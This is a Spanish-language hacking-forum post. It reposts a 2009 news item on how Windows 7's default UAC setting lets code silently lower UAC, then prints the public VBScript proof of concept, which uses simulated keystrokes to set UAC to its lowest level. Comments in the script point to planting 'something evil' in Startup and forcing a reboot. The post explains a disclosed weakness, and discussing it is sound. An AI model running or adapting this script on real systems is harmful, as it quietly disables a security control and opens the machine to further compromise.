Usabilidad contra Seguridad: ¿Qué hacemos con el UAC en Windows 7?

  • 0 Respuestas
  • 2156 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ProcessKill

  • *
  • Underc0der
  • Mensajes: 154
  • Actividad:
    0%
  • Reputación 0
  • Arriba los hackers de Argentina!
    • Ver Perfil
    • Email
Citar
por : Juan Ranchal: 01 Feb 2009, 20:09

El Control de Cuentas de Usuario (UAC) presente en Windows Vista, fue una de las características criticadas por los usuarios ante la gran cantidad de acciones que necesitaban autorización. Estas quejas generalizadas han llevado a Microsoft a permitir en Windows 7 la configuración del nivel de alertas, lo que puede dar como resultado graves problemas de seguridad.

En los últimos días, blogs como Within Windows han informado y demostrado como se puede variar la configuración del UAC mediante código malicioso, hasta conseguir desactivarlo. El usuario no se entera debido a la configuración por defecto presente en Windows 7 (no avisarme cuando haga cambios en la configuración de Windows), por lo que el atacante puede cambiar los archivos del sistema y adueñarse de la máquina:




Citar
La respuesta de Microsoft ante este problema no ha sido demasiado satisfactoria y un portavoz indicó que “esto no es una vulnerabilidad. La intención de esta configuración por defecto de UAC es que no se pida autorización al usuario a la hora de realizar cambios en la configuración de Windows, que incluye cambiar la configuración del mismo UAC”.

Es decir que la configuración del control de cuentas en 7 obedece al propio “diseño del sistema”. Sarcásticamente, la única solución parece ser volver a la configuración que ofrecía Vista, con sus molestias añadidas que acababan con la paciencia de la mayoría de usuarios que desactivaban directamente esta medida de seguridad.

Quedan unos meses para la versión final y si Microsoft no lo remedia, nos tememos que el UAC seguirá haciendo de las suyas, ahora por distintas razones que en Vista.


Bueno, este es uno de los sitios en donde aparece la noticia referente al nuevo "fallo" del UAC del futuro Win 7, y ahora muchos se preguntarán que hace esto aquí, sencillo, el  POC (Proof of concept) que se ha utilizado para demostrar esto esta codeado en vbs   y he aquí el code:

Código: [Seleccionar]
'// 1337H4x Written by _____________
'//                    (12 year old)
 
Set WshShell = WScript.CreateObject("WScript.Shell")
 
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
 
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
 
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
 
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
 
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
 
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
 
'// Reboot the system
'// WshShell.Run "shutdown /r /f"


(http://www.withinwindows.com/files/uac/poc.vbs.txt)


Como se ve el script es por demás sencillo, en todo el code solo se aprecian algunas ordenes realizadas a base de sendkeys

Este script básicamente lo que hace es simular la interacción del usuario con lo que serían los mensajes de alerta del UAC, disminuyendo el nivel de seguridad del mismo, lo que permitiría realizar cambios futuros sin ningún tipo de alerta 

Saludos 
« Última modificación: Julio 21, 2014, 07:21:01 pm por Expermicid »

 

[POWERSHELL] Obtener lista de contraseñas del Secure Vault de windows!

Iniciado por 79137913

Respuestas: 4
Vistas: 4700
Último mensaje Marzo 23, 2018, 02:38:27 pm
por Drok3r